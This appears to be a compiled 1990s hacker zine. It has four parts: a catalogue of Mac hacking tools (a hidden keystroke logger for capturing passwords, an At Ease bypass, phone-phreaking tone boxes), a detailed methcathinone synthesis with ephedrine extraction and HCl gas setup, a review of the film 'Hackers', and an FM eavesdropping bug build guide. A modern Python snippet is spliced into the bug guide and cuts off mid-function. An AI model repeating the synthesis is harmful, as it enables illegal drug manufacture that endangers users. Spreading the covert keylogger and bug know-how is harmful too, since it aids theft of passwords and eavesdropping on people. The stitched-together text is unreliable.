1.0, and it wasn’t as good as Assault Dialer, so that’s your best bet right 
now. 


MacPGP 2.6.2 and PGPfone 1.0b4 

MacPGP is the Macintosh port of the infamous PGP (Pretty Good 
Privacy). This file is not about cryptography, so if you want to know about 
PGP read the fuckin’ read me and docs that come with the file. Strangely 
enough, however, Phil Zimmermann released PGPfone, a utility for encrypting 
your phone and making it a secure line, for the Mac _first._ I don’t know 
why, and I haven’t had a chance to test it, but the idea’s pretty cool. If 
PGP doesn’t get Zimmermann thrown in jail, this will. 


DisEase 1.0 and DisEase 3.0 

Schools and concerned parents have always had a problem. Schools 
can’t have students deleting the hard drive, and parents don’t want their 
kids looking at the kinky pictures they downloaded. So Apple came out with 
At Ease, an operating system that runs over System 7, sort of the same way 
Windows runs off of DOS. However, I can’t stand At Ease. Everything about 
it, from the Fisher-Price screen to the interface drives me crazy. It 
drives a lot of other people crazy too. So it was just a matter of time 
before someone made a program to override it. The first was DisEase 1.0, a 
small program by someone calling himself Omletman, that would override At 
Ease if you put in a floppy loaded with it and clicked six times. Omletman 
improved this design and eventually released 3.0. (I haven’t been able to 
find any evidence that a 2.0 was ever released.) 3.0 has such cool features 
as reading the preferences file to give you the password, so you can change 
the obnoxious greeting teachers always put to something more sinister. The 
only problem with 3.0 is that some configurations of At Ease only let 
documents be read off of disks; no applications, which means DisEase 3.0 
won’t appear, and so you can’t run it. However, with 1.0 you don’t have to 
actually open the application, you just click six times, so if you use 1.0 
to get to the finder, and then 3.0 to read the passwords, things will work. 


Invisible Oasis Installer 

Oasis is a keystroke recorder, so you can find out passwords. 
However, with the original Oasis, you had to put it in the Extensions 
folder and make it invisible with ResEdit, which takes a while. Invisible 
Oasis Installer, however, installs it where it should be and automatically 
makes it invisible. 
"So everything’s wrapped up in a nice neat little _package_, then?" 
-Homer Simpson 


Anonymity 2.0 and Repersonalize 1.0 

Anonymity, version 1.2, was a rather old program, whose author has 
long been forgotten, that was the best data fork alterer available. It 
removed the personalization from programs. However, in around 1990 someone 
named the Doctor made 2.0, a version with some improvements. Repersonalize 
was made in 1988 (God, Mac hacking programs are old) and resets the 
personalization on some of the Microsoft and Claris programs, so you can 
enter a different personalization name. I don’t know if it will still work 
on Microsoft Word 6.0.1 and versions of programs released recently, but I 
don’t really care because I use Word 5.1a and I’m probably not going to 
upgrade for a while. 


Phoney (AKA Phoney4Mac) 

Phoney is an excellent program that emulates the Blue Box, Red Box, 
Black Box and Green Box tones. There is also Phoney4Newton, which does the 
same thing on the most portable of computers, the Newton. 


That’s all I’m covering in this file as far as Mac hacking 
programs. You’ll probably want to know where to find all this crap, so here 
are all of the Mac hacking ftp and Web sites I know of: 

Space Rogue’s Whacked Mac Archives (http://l0pht.com/~spacerog/index.html) 

This site, run by Space Rogue, is L0pht Heavy Industries’ Mac site. 
It is probably the largest and best archive of Mac hacking software 
connected to the Internet. The problem with this is that it can’t handle 
more than two anonymous users, meaning that unless you pay to be part of 
L0pht, you will never get into this archive. I’ve tried getting up at 4:30 
AM, thinking that no one in their right mind would possibly be awake at 
this time, but there is always, somehow, somewhere, two people in Iceland 
or Singapore or somewhere on this site. 

The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html) 

This site does not look like much, and it is fairly obvious that 
its maintainer, Sean Warren, is still learning HTML, but it is reliable and 
is a good archive. It is still growing, probably due to the fact that it is 
one of the only Internet Mac hacking sites anyone can get to and upload. 
Kn0wledge Phreak <k0p> (http://www.uccs.edu/~abusby/k0p.html) 

This is an excellent site and has many good programs. There is one 
catch, however. Its maintainer, Ole Buzzard, is actually getting the files 
from his BBS. So many of the really good files are locked away in the k0p 
BBS, and those of us who can’t pay long distance can’t get the files. Oh 
well. 

Bone’s H/P/C Page o’ rama - part of the Cyber Rights Now! home page 
(http://www.lib.iup.edu/~seaman/index.html) 

While this is hardly a Macintosh hacking site, it’s just a hacking 
site, it does have very few Mac files, some of which are hard to get to. 
However, Bone might get expelled because of a long story involving AOHell, 
so this page might not be here. Then again, maybe Bone won’t get expelled 
and this site will stay. Never can tell ’bout the future, can you? 

"We predict the future. We invent it." 
-Nasty government guy on the season premiere of _The X-Files_ 


Andy Ryder 

Netsurfer and Road Warrior on the Info Highway 

I’ve pestered Bruce Sterling _and_ R.U. Sirius! 

As mentioned in the alt.devilbunnies FAQ, part I (Look it up!) 
Once scored 29,013,920 points on Missile Command 


"This Snow Crash thing- is it a virus, a drug, or a religion?" 
-Hiro Protagonist 

"What’s the difference?" 
—Juanita Marquez 


"...one person’s ’cyberpunk’ is another’s everyday obnoxious teenager with 
some technical skill thrown in..." 

-Erich Schneider, "alt.cyberpunk Frequently Asked Questions List" 
"More than _some_ technical skill." 


-Andy Ryder 
Making Methcathinone 
Compiled 
by Anonymous 
Ok, this has got to be the easiest drug made at home (by far). This is very 
similar to methamphetamine in structure, effect, and use. Typical doses 


start at 20mg up to 60mg. Start low, go slow. Cat can be taken orally (add 
10 mg) or through mucous membranes (nasally). 


Ingredients: 

Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine. 

Potassium chromate, or dichromate (easily gotten from chem lab. orange/red) 

Conc. Sulfuric acid - it’s up to you where you get this. Contact me if you 
need help locating it. 

Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it 

is used for cleaning concrete. 
Sodium Hydroxide - Hardware stores. AKA lye. 
Toluene - Hardware store, paint store. 


Lab equipment: 
1 liter, 3 neck flask - get it from school or Edmund’s Scientific ($20.00) 


125 mL separatory funnel - same as above 

glass tubing - same as above 

Buchner funnel - This is a hard to find item, but must schools have at least 
one. They are usually white porcelain or plastic. They look 
like a funnel with a flat disk in the bottom with lots of 
holes in it. If you need one, arrangements can be made. 

Aspirator or vacuum pump —- Any lab-ware supply catalog, about $10.00 


References to Edmund’s Scientific Co, in NJ, are accurate. You have to go 
to their "Lab Surplus/Mad Scientist" room. The prices are incredibl 
This place is definitely a recommended stopping sight for anybody going 


through New Jersey. It is located in "Barrington", about 30 minutes from 
center city Philadelphia. 

All of the above can be purchased from "The Al-Chymist". Their number is 
(619) 948-4150. Their address is: 17525 Alder #49 


Hesperia, Ca 92345 
Call and ask for a catalog. 


That’s it. The body of this article is stolen from the third edition of 
"Secrets of Methamphetamine Manufacture" by Uncle Fester. This is a tried 
and proven method by many people. If you want a copy of this book, contact 
me. 


Good luck and keep away from the DEA 


METHCATHINON 


ia 


Koed i@ 


tH 


N IMPROVIESED CRANK 


The latest designer variant upon the amphetamine molecule to gain 
popularity and publicity is methcathinone, commonly called cat. This 
substance is remarkably similar to the active ingredient found in the 
leaves of the khat tree which the loyal drug warriors on the network news 
blame for turning peace loving Somalis into murderous psychopaths. The 
active ingredient in the khat leaves is cathinone, which has the same 
structural relationship to methcathinone that amphetamine has to 
methamphetamine. It is made by oxidizing ephedrine, while meth can be 
made by reducing ephedrine. 


The high produced by methcathinone is in many ways similar to 
methamphetamine. For something so easily made and purified, it is 
actually quite enjoyable. the main differences between the meth high and 
the methcathinone high are length of action and body fell. With 
methcathinone, one can expect to still get to sleep about 8 hours after a 


large dose. On the down side, it definitely gives me the impression that 
the substance raises the blood pressure quite markedly. This drug may not 
be safe for people with weak hearts of blood vessels. Be warned! 


Cat is best made using chrome in the +6 oxidation state as the 
oxidizer. I recall seeing an article in the narco swine’s Journal of 
Forensic Science bragging about how they worked out a method for making it 
using permanganate, but that method gives an impure product in low yields. 
Any of the common hexavalent chrome salts can be used as the oxidizer in 
this reaction. This list include chrome trioxide (Cr0O3), sodium or 
potassium chromate (Na2CrO4), and sodium or potassium dichromate 
(Na2Cr207). All of these chemicals are very common. Chrome trioxide is 
used in great quantities in chrome plating. The chromates are used in 
tanning and leather making. 


To make methcathinone, the chemist starts with the water extract of 
ephedrine pills. The concentration of the reactants in this case is not 
critically important, so it is most convenient to use the water extract of 
the pills directly after filtering without any boiling away of the water. 
See the section at the beginning of Chapter 15 [I included this at the end 
of the file] on extracting ephedrine form pills. Both ephedrine 
hydrochloride and sulfate can be used in this reaction. 


The water extract of 1000 ephedrine pills is placed into any 
convenient glass container. A large measuring cup is probably best since 
it has a pouring lip. Next, 75 grams of any of the above mentioned +6 
chrome compounds are added. They dissolve quite easily to form a reddish 
or orange colored solution. Finally, concentrated sulfuric acid is added. 
If CrO3 is being used, 21 mL is enough for the job. If one of the 
chromates is being used, 42 mL is called for. These ingredients are 
thoroughly mixed together, and allowed to sit for several hours with 
occasional stirring. 


After several hours have passed, lye solution is added to the batch 
until it is strongly basic. Very strong stirring accompanies this process 
to ensure that the cat is converted to the fr base. Next, the batch is 
poured into a sep funnel, and a couple hundred mLs of toluene is added. 
Vigorous shaking, as usual, extracts the cat into the toluene layer. It 
should be clear to pale yellow in color. The water layer should be orange 
mixed with green. The green may settle out as a heavy sludge. The water 
layer is thrown away, and the toluene layer containing the cat is washed 
once with water, then poured into a beaker. Dry HCl gas is passed through 
the toluene as described in Chapter 5 [I included this at the end of the file] 
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to get white crystals of cat. The yield is between 15 and 20 
grams. This reaction is scaled up quite easily. 


CHAPTER 15 (part of it anyway) 


PROC 


ie 
1s) 
a 
vs) 


BE 
ay 


OBTA N NG PURE EF PHEDRIN 
Ss TIM L N T PILtuUs 


FOR ue dls 

FROM U A 
In the present chemical supply environment, the best routes for making 

meth start with ephedrine as the raw material. To use these routes, a 
serious hurdle must first be overcome. This hurdle is the fact that the 
most easily obtained source of ephedrine, the so-called stimulant or 
bronchodilator pills available cheaply by mail order, are a far cry from 
the pure starting material a quality minded chemist craves. Luckily, 
there is a simple and very low profile method for separating the fillers 


in these pills from the desired active ingredient they contain. 


A superficial paging through many popular magazines[New Body is where 
I found it at GNC] reveals them to be brim full of ads 
from mail order outfits offering for sale "Stimulant" or "bronchodilator" 
pills. These are the raw materials today’s clandestine operator requires 
to manufacture meth without detection. The crank maker can hide amongst 
the huge herd of people who order these pills for the irritating and 
nauseating high that can be had by eating them as is. I have heard of a 
few cases where search warrants were obtained against people who ordered 
very large numbers of these pills, but I would think that orders of up to 
a few thousand pills would pass unnoticed. If larger numbers are 
required, maybe one’s friends could join in the effort. 


The first thing one notices when scanning these ads is the large 
variety of pills offered for sale. When one’s purpose is to convert them 
into methamphetamine, it is very easy to eliminate most of the pills 
offered for sale. Colored pills are automatically rejected because on 
does not want the coloring to be carried into the product. Similarly, 
capsules are rejected because individually cutting open capsules is just 
too much work. Bulky pills are to be avoided because they contain too much 
filler. The correct choice is white cross thins, preferably containing 
ephedrine HCl instead of sulfate, because the HCl salt can be used in more 
of the reduction routes than can the sulfate. 


Once the desired supply of pills is in hand, the first thing which 
should be done is to weigh them. This will give the manufacturer an idea 
of how much of the pills is filler, and how much is active ingredient. 
Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle 
contains 25 grams of active ingredient. A good brand of white cross thins 
will be around 33% to 40% active ingredient. 25 grams of ephedrine HCl 
may not sound like much, but if it is all recovered from these pills, it 
is enough to make from 1/2 to 3/4 ounce of pure meth. This is worth three 
or four thousand dollars, not a bad return on the twenty odd dollars a 
thousand lot of such pills costs. [I don’t know where he got 3 or 4 
thousand dollars from, but the pills go for about $35.00/1000 now. 2 
months ago they were $25.00 but now they have to do more paper work 
because it is a DEA controlled substance 


To extract the ephedrine from the pills, the first thing which must be 
done is to grind them into a fine powder. This pulverization must be 
thorough in order to ensure complete extraction of the ephedrine form the 
filler matrix in which it is bound. A blender does a fine job of this 
procedure, as will certain brands of home coffee grinders. 


Next, the powder from 1000 pills is put into a glass beaker, or other 
Similar container having a pouring lip, and about 300 mL of distilled 
water is added. Gentle heat is then applied to the beaker, as for example 
on a stove burner, and with steady stirring the contents of the beaker are 
slowly brought up to a gentle boil. It is necessary to stir constantly 
because of the fillers will settle to the bottom of the beaker and cause 
burning if not steadily stirred. 


ial 
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Once the contents of the beaker have been brought to a boil, it is 
removed from the heat and allowed to settle. Then the water is poured out 
of the beaker through a piece of filter paper. The filtered water should 
be absolutely clear. Next, another 50 mL of water is added to the pill 
filler sludge, and it too is heated with stirring. Finally, the pill 
sludge is poured into the filter, and the water it contains is allowed to 
filter through. It too should be absolutely clear, and should be mixed in 
with the first extract. A little water may be poured over the top of the 
filler sludge to get the last of the ephedrine out of it. This sludge 
should be nearly tasteless, and gritty in texture. The water extract 
should taste very bitter, as it contains the ephedrine. 


The filtered water is now returned to the stove burner, and half of 
the water it contains is gently boiled away. Once this much water has 
been boiled off, precautions should be taken to avoid burning the 
phedrine. The best alternative is to evaporate the water off under a 
vacuum. If this is not practical with the equipment on hand, the water 
may be poured into a glass baking dish. This dish is then put into the 
oven with the door cracked open, and the lowest heat applied. In no time 
at all, dry crystals of ephedrine HCl can be scraped out of the baking 
dish with a razor blade. The serious kitchen experimenter may wish to 
further dry them in a microwave. 


Chapter 5 (The part about the HCl gas) 


A source of anhydrous hydrogen chloride gas is now needed. The 
chemist will generate his own. The glassware is set up as in Figure 1. 
He will have to bend another piece of glass tubing to the shape shown. It 
should start out about 18 inches long. One end of it should be pushed 
through a one hole stopper. A 125 mL sep funnel is the best size. The 
stoppers and joints must be tight, since pressure must develop inside this 
flask to force the hydrogen chloride gas out through the tubing as it is 
generated. 


Into the 1000 mL, three-necked flask is placed 200 grams of table 
salt. Then 25% concentrated hydrochloric acid is added to this flask until 
it reaches the level shown in the figure. The hydrochloric acid must be 
of laboratory grade [I use regular muriatic acid for pools]. 


Figure 1: 
\ / 
\ /Re 
0% Oe <--125 mL separatory funnel 
Oe O% 
Ae AX’ glass tubing Az 
Oe 0% \037 
ft » 
stopcock—>U2A ° Salt and Hydrochloric acid 
stopper —>As \/De Ae <-1 hole mixed into a paste by add- 
Ae Ae stopper ing HCL to salt and mixing. 
A%  A¥ A% Ae The surface should be rough 
O¥ Oe and a good number of holes 
should be poked into the 
1000 mL, 3 neck flask paste for long lasting 
generation of HCl gas. 
Oe acid/salt level o% 
Ae AX% 
Re AX% 
Re AX% 
AX% 


Some concentrated sulfuric acid (96-98%) is put into the sep funnel 
and the spigot turned so that 1 mL of concentrated sulfuric acid flows 
into the flask. It dehydrates the hydrochloric acid and produces hydrogen 




chloride gas. This gas is then forced by pressure through the glass 


tubing. 


One of the Erlenmeyer flasks containing methamphetamine in solvent is 
placed so that the glass tubing extends into the methamphetamine, almost 
reaching the bottom of the flask. Dripping in more sulfuric acid as 
needed keeps the flow of gas going to the methamphetamine. If the flow if 
gas is not maintained, the methamphetamine may solidify inside the glass 


tubing, plugging it up. 


Within a minute of bubbling, white crystals begin to appear in the 
solution, More and more of them appear as the process continues. It is an 
awe-inspiring sight. In a few minutes, the solution becomes as thick as 


watery oatmeal. 


It is now time to filter out the crystals, which is a two man job. 
The flask with the crystals in it is removed from the HCl source and 


necked flask is swirled a little to 


temporarily set aside. Th 


thr 


spread around the sulfuric acid and then the other Erlenmeyer flask is 
subjected to a bubbling with HCl. While this flask is being bubbled, the 


crystals already in the other flask are filtered out. 


The filtering 


lask and Buchner funnel are set up as shown in figure 


2. The drain stem of the buchner funnel extends all the way through the 
CG 


rubber stopper, b 


ause methamphetamine has a nasty tendency to dissolve 


rubber stoppers. This would color the product black. A piece of filter 
paper covers the flat bottom of the Buchner funnel. The vacuum is turned 
on and the hose attached to the vacuum nipple. Then the crystals are 


poured into the Buchner funnel. 


methamphetamine pass through th 


Buchner funnel as a solid 


cake. 


shaken to suspend the crystals 


poured into the Buchner funnel. 


The solvent and uncrystallized 


filter paper and the crystals stay in the 
About 15 mL of solvent is poured into the 


Erlenmeyer flask. the top of the flask is covered with the palm and it is 


left clinging to the sides. his is also 


Finally, another 15 mL of solvent is 


filter cak 


poured over the top of th 


Figure 2: 


Filtering 


Ag 
<-Bchner Funnel 
\ / 
\ / 
ot / 
Ag 
<--To vacuum 
Ag 
Ag 


flask--> 


Now the vacuum hose is disconnected and the Buchner funnel, stopper 
and all, is pulled from the filtering flask. All of the filtered solvent 
is poured back into the erlenmeyer flask it came from. It is returned to 
the HCl source for more bubbling. The Buchner funnel is put back into the 


top of the filtering flask. 


methamphetamine crystals. 
vacuum is turned back on, 


section of latex rubber gj] 


It still contains the filter cake of 


It will now be dried out a little bit. The 
the vacuum hose is attached to the filtering 
flask, and the top of the Buchner funnel is covered with the palm or 


lOve. 


solvent from the filter cak 


The vacuum builds and removes most of the 
This takes about 60 seconds. The filter 


cake can now be dumped out onto a glass or China plate (not plastic) by 


tipping the Buchner funnel 


1 upside-down and tapping it gently on the plate. 
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And so, the filtering proc 
while the other one is being b 
Erlenmeyer flask to keep their 
flask has been bubbled for abo 
out and the underground chemis 


If ether was used as the s 
be nearly dry now. With a kni 


into powder. If benzene was u 
may be used to speed up this d 


ess continues, one flask being filtered 
ubbled with HCl. Solvent i 


s added to the 


volumes at 300 mL. Eventually, after each 
ut seven times, no more crystal will come 


t is finished. 


olvent, the filter cakes on the plates will 


fe from the silverwar 


drawer, the cakes ar 
cut into eighths. They are allowed to dry out some more then chopped up 
sed, this process takes longer. Heat lamps 
rying, but no stronger heat source. 


[The above section of chapter 5 is talking about methamphetamine. You 
could, in most instances, substitute the word methcathinone, but I wanted 


to present the text to you in 


its exact form. ] 


Review of "HACKERS" 


By Wile Coyote 


Sorry, it might be a little long... cut it to ribbons if you want, most 
of it is just a rant anyway... Hope you enjoy it. 


First off, I have to admit that I was biased going into the movie 
"Hackers"... I heard that it wasn’t going to be up to snuff, but did I 
let that stop me? No, of course not... I sucked up enough courage to 
stride towards my girlfriend and beg for seven bucks... :) She ended up 
wanting to see the movie herself (and sadly, she rather enjoyed it... 
oh, well, what can you do with the computer illiterate or is it the 
computer illegitimate?). Now on with 


THE MOVIE 


(Yes, I AM going to give you a second-by-second playback of the 
movie... you don’t want me to spoil the plot, you say? Well, don’t 
worry, there is no plot to spoil! :) just kidding, go see it... maybe 
you'll like it...) 


Well, from the very first few seconds, I was unimpressed... It begins 
with an FBI raid on some unsuspecting loser (who turns out to be the 
main character, but that’s later) named Zero Cool (can you say 
"WaReZ DOOD!!!!!!!"). The cinematography was bad... (Hey, 
cinematography counts!) But, the acting was worse. The Feds bust into 
this home and run up the stairs, all while this lady (the mom) just kind 
of looks on dumbfounded and keeps saying stuff like "[quote garbled in 
the scan]" or something (is this what a raid is like? I’ve never had 
the pleasure... 


Ok, so the story goes on like this: The 11 year old kid made a computer 
virus that he uploads to, I think, the NY stock exchange, and it crashes 
1,507 computers. There is a really lame court scene where the kid is 
sentenced to 7 years probation where he can’t use a computer or a 
touch-tone phone... That was 1988... 


Time passes... Now it’s 1995, and boy have things changed (except the 
mom... hmmm....). Now the ex-hacker is allowed to use a computer (his 
18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) 
boxing some TV station to change the program on television (yes, I know 
that all of you super-el33t hackers hack into TV stations when you don’t 
like what’s on Ricki Lake!). N-e-way, while hacking into their 
super-funky system (the screen just kind of has numbers moving up and 
down the screen like some kind of hex-editor on acid...) 
he gets into a "hacking battle" with some other hacker called Acid Burn 
(I don’t think I have ever seen such a trippy view of the [...] 
lots of Very high-end graphics, not very realistic, but it’s Hollywood...). 
In the end, the other hacker kicks the shit out of him (he has changed 

his handle to Crash Override now, just to be cool, i guess) and logs him 
off the TV station. Wow, tense... cough... 


For those of you who care, let me describe the "hacker" Crash Override: 

He is definitely super-funky-—coole-mo-d-el31t-to-the-max, ‘cause he is 
(kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky) 
clothes, and the CDC might have quite a bit to say about the amount of 
leather he wears... I mean, there are limits to that kind of stuff, man! 
And to top off his coolness, he is, like, the roller-blade king of the 
world. (Not that hackers don’t roller-blade, but he does it just Soooo 
much cooler than I could... :) ). And yet, here’s the nifty part, 

despite all of his deft coolness, he couldn’t get a girl for the life 

of him (we all mourn for him in silent prayer). 


Ok, so now Crash is at school, and he meets Wonderchick (who is
EXACTLYFUCKINGLIKEHIM, and is, of course, an 3L31t hackerette... ok, she
is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to
spoil the suspense).

Now, while at school, he wants to hook up with Wonderchick, so he breaks
into the school's computer (it must be a fucking Cray to support all of
the high-end-type graphics that this dude is pulling up) and gets his
English(?) class changed to hers. So, some other super-d00dcool hacker
spots him playing around with the school's computer (it's funny how many
elite hackers one can meet in a New York public school...), so he
catches up with Crash and invites him to an elite (Oh, if you ever want
to see a movie where the word 31333333333t is used, like, a fucking
million times, then go see Hackers...) hackerz-only club, complete with
million-dollar virtual-reality crap and even a token phreaker trying to
red-box a pay-phone with a cassette recorder (never mind that the music is
about 197 decibels, the phone can still pick up the box tones...).


What follows is that Crash meets up with some seriously k-rad hackers
(Cereal Killer: reminds you of Mork & Mindy meets Dazed and Confused;
Phantom Phreak: who reminds you of that gay kid on "My So-Called Life"...
maybe that was him?; Lord Nikon: the token black hacker... photographic
memory is his super-power). They talk about k001 pseudo-hacker shit and
then a 100ser warez-type guy comes up and tries to be E133t like everybody
else. He is just about the ONLY realistic character in the whole movie.
He acts JUST like a wannabe: "Hiya DOOdz, kan eye b kOewl too?". He keeps
saying "I need a handle, then I'll be el33t!". (Why he can't just pick
his own handle, like The Avenging Turd or something, is beyond me... He
plays lamer better than the kids in Mighty Morphin Power Rangers... awesome
actor!). N-e-way, this is where the major discrepancies start. Ok,
first they try to "test" Lamerboy by asking him what the four most used
passwords are. According to the movie, they are "love, sex, god, and
secret". (Hmmmm.... I thought Unix required a 6-8 char. password....).
Somehow Lamerboy got into a bank and screwed with an ATM machine four
states away; all of the hackers chastise him for being stupid and hacking
at home (If you watch the movie, you'll notice that the hackers use just
about every pay-phone in the city to do their hacking; no, THAT doesn't
look suspicious). Next they talk about "hacking a Gibson". (I was
informed that they WANTED to use "hacking a Cray", but the Cray people
decided that they didn't want THAT kind of publicity. I've never heard
of a Gibson in real life, though...).

They talk about how k-powerful the security is on a Gibson, and they say
that if Lamerboy can crack one, then he gets to be elite.


Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash
loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy
finally cracks a Gibson with the password God (never mind a login name or
anything that cool). Then the cheese begins in full force. The Gibson
is like a total virtual-reality thingy, complete with all sorts of cool
looking towers and neon lightning bolts and stuff. Lamerboy hacks into a
garbage file (did I mention that the entire world is populated by Macs?
Oh, well, hold on :)...). So, this sets alarms off all over the place
('cause a top-secret file is hidden in the garbage, see?), and the main
bad-guy, security chief Weasel, heads out to catch him. He plays around
with some neon, star-trek-console buttons for a while, then calls the
"feds" to put a trace on the kid. La de da, the feds catch him in a
second, and the kid only gets half of the file, which he hides.

(To spoil the suspense, yet again, the file is some kind of money-getting
program, like the kind some LOD members wrote about a long time ago in
Phrack, which pulls money from each transaction and puts it into a
different account. Needless to say, the Security Weasel is the guy who
wrote it, which is why he needs it back, pronto!).


As we travel along the movie, the hackers keep getting busted for tapping
into the Gibson, and they keep getting away. The "action" heats up when
Wonderchick and Crash get into a tiff and they decide to have a hacking
contest... They go all over the city trying their best to fuck with
the one fed they don't like.... Brilliant move, eh? The movie kind of
reaches a lull when, at a party at Wonderchick's house, they see a k-rad
laptop.

They all fondle over the machine with the same intensity that Captain Kirk
gave to fighting Klingons, and frankly, their acting abilities seem
to ask "please deposit thirty-five cents for the next three minutes".
It was funny listening to the actors, 'cause they didn't know shit about
what they were saying... Here's a clip:

Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem... Not
Kbps, mind you :)... I wonder where they designed .8 of a bit?)

Yeah! Cool... Hey, what kind of chip does it have in it?

A P6! Three times faster than a Pentium.... Yep, RISC is the wave of
the future... (I laughed so hard..... Ok, first of all, it is a Mac.
Trust me, it has the little apple on the cover. Second, it has a P6; what
server she ripped this out of, I dare not ask. How she got that
bastard into a laptop without causing the casing to begin melting is
yet another problem... those get very hot, I just read about them
in PC Magazine (wow, I must be elite too). Finally, this is a *magic* P6,
because it has RISC coding....

I kinda wished I had stayed for the credits to see the line:
Technical advisor: None.... died en route to work...)


Finally they ask something about the screen, and they find out it is...
hold your breath.... ACTIVE MATRIX! ... Kick ass!


They do lots of nifty things with their magic laptops (I noticed that they
ALL had laptops, and they were ALL Macintoshes. Now, I'm not one to say
you can't hack on a Mac, 'cause really you can hack on a TI-81 if you've
got the know.... but please, not EVERYONE in the fucking movie
has to have the exact same computer (different colors, though... there
was a really cool clear one).... it got really sad at the end), and they
finally find out what the garbage file that Lamerboy stole was, this time
using a hex editor/CAD program of some sort.


As we reach the end of the movie, the hackers enlist the help of two very
strangely painted phone phreaks who advise the hackers to send a message
to all of the hackers on the 'net, and together, they all kick some
serious ass with the super-nifty-virtual-reality Gibson.

In the end, all of the hackers get caught except for one, who pirates all
of the TV stations in the world and gives the police the "real" story...
So, the police politely let them go, no need for actually proving that the
evidence was real or anything, of course.


So, in the end, I had to say that the movie was very lacking. It seemed
to be more of a Hollywood-type flashy movie than an actual documentary
about hackers. Yes, I know an ACTUAL movie about hackers would suck, but
PLEASE, just a LITTLE bit of reality helps keep the movie grounded. It
may have sucked less if they didn't put flashing, 64-million-color,
fully-rendered, magically delicious pictures floating all over the screen
instead of just a simple "# " prompt at the bottom. With all of the
super-easy access to all of the world's computers, as depicted in the movie,
ANYBODY can be a hacker, regardless of knowledge, commitment, or just
plain common sense. And that's what really made it suck...


Hope you enjoyed my review of HACKERS!

PART II

CONSTRUCTING AN FM BUG

written by Obi-1
edjjs@cc.newcastle.edu.au

Written for Phrack. If any other magazine wishes to print this
article they must let the author know in advance.

INTRODUCTION


Before anything, this article's sole purpose is to teach everyone
out there about electronics. If you do build it, use it at your own risk.
You will need a decent knowledge of electronics and how to solder some
components. So if you don't know how to build electronic kits and want a
bug, you can buy one ready-made from me, just write to the e-mail address
above. Ok, enough crap.. so you ask what an FM bug is; well, an FM bug is
like a tiny microphone that can transmit crystal clear audio to a nearby
Walkman/stereo etc. The range of the bug we are making is about 800
meters, and the battery life is about 100hrs on a normal alkaline
battery. This bug however is not to be moved while in use, so you can't
put it in your pocket and walk around. There are other bugs on the
market but this I found to be the most reliable and relatively easy to
build. The actual size of the PCB is only 2cm X 2cm! However the battery
is actually the biggest component. Some parts like the surface mount
resistors, air trimmer and electret microphone may be hard to find. I
find mail-order catalogs are the best source of parts as they have a
bigger range than a store like Dick Smith. I did not actually design
this circuit, Talking Electronics did, but I felt everyone out there might
like to know how to build one of these. The surface mount resistors can
be replaced with normal resistors but I recommend using the surface
mount resistors as they give more of an educational experience to this
project <puke> <puke>. If you don't have a clue how to build a bug and
have no knowledge of electronics whatsoever, e-mail me and you can
purchase one pre-built from me.


COMPONENT LIST

Resistors
1- 470R surface mount
1- 10k surface mount
1- 47k surface mount
1- 68k surface mount
1- 1M surface mount

Capacitors
1- 10p disc ceramic
1- 39p disc ceramic
1- 1n disc ceramic
2- 22n disc ceramic
1- 100n monoblock (monolithic)
1- air trimmer 2p-10p

Other
2- BC 547 transistors
1- 5 turn coil, 0.5mm enameled wire
1- electret mic insert, high sensitivity
1- 9V battery snap
1- 15cm tinned copper wire
1- 30cm fine solder
1- 170cm antenna wire


NOTE: use 170cm of electrical wire for the antenna; this length will give
you maximum range, however since the antenna wire needs to be extended
when bugging, concealability might be a factor. You can shorten the
wire's length but this will shorten the range yet make it easier to
conceal. Weigh the factors and do what's right for you.


ASSEMBLY OF CIRCUIT 


First familiarize yourself with the layout of the components.
Now the only polarized parts (parts that have to be put around the right
way) are the two transistors, the battery and the microphone. All other
parts can be soldered either way around. I recommend using this order for
assembly as it is the most practical and easiest way to build the bug.

1. 5 surface mount resistors.
2. 6 capacitors.
3. 2 transistors.
4. air trimmer.
5. 5-turn coil.
6. battery snap.
7. microphone.
8. antenna wire.


READING RESISTOR AND CAPACITOR VALUES 


If you dont know how to read the value of a surface mount 
resistor or disc ceramic capacitor read on. 


Surface mount resistor: These have three digits, with the first two
digits being multiplied by the third. The third digit represents how
many zeros follow the first two. For example a surface mount resistor
with code 1-0-5 would mean that the first two digits (1-0) are followed
by 5 zeros, to give the value 1 000 000 ohms or 1M ohm.

Capacitor: These are similar to the above but the base unit is pF or
picofarads, e.g. a capacitor labeled 2-2-3 has the value of 22 000pF (22n).
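As an added example (not from the article or from Talking Electronics), here is a small Python decoder for the three-digit markings just described; it also works the article's parts list backwards to the code you should find printed on each part.

```python
import re

# Three-digit marking: digits 1 and 2 are the significand, digit 3 is the
# number of trailing zeros.  Resistors are read in ohms, disc ceramic
# capacitors in picofarads.  The regex also accepts the article's "1-0-5"
# spelling of a code.
_CODE_RE = re.compile(r"^(\d)-?(\d)-?(\d)$")

# Suffix letters as used in the component list ("470R", "47k", "1M", "22n").
RESISTOR_PREFIXES = {"R": 1, "k": 10**3, "M": 10**6}
CAPACITOR_PREFIXES = {"p": 1, "n": 10**3, "u": 10**6}


def decode_code(code: str) -> int:
    """Turn a three-digit marking into its base value (ohms or pF)."""
    m = _CODE_RE.match(code.strip())
    if not m:
        raise ValueError(f"not a three-digit code: {code!r}")
    first, second, zeros = (int(g) for g in m.groups())
    return (10 * first + second) * 10 ** zeros


def encode_code(value: int) -> str:
    """Inverse of decode_code: a base value back to its three-digit marking."""
    if value <= 0:
        raise ValueError("value must be positive")
    zeros = 0
    # Strip trailing zeros until only the two significant digits remain.
    while value >= 100 and value % 10 == 0:
        value //= 10
        zeros += 1
    if value > 99 or zeros > 9:
        raise ValueError(f"{value}e{zeros} cannot be marked with three digits")
    return f"{value:02d}{zeros}"


def parse_printed(text: str, prefixes: dict) -> int:
    """Parse a printed value such as '47k' or '22n' into the base unit."""
    m = re.fullmatch(r"\s*(\d+(?:\.\d+)?)\s*([A-Za-z])\s*", text)
    if not m or m.group(2) not in prefixes:
        raise ValueError(f"unrecognised value: {text!r}")
    return int(round(float(m.group(1)) * prefixes[m.group(2)]))


def format_printed(value: int, prefixes: dict) -> str:
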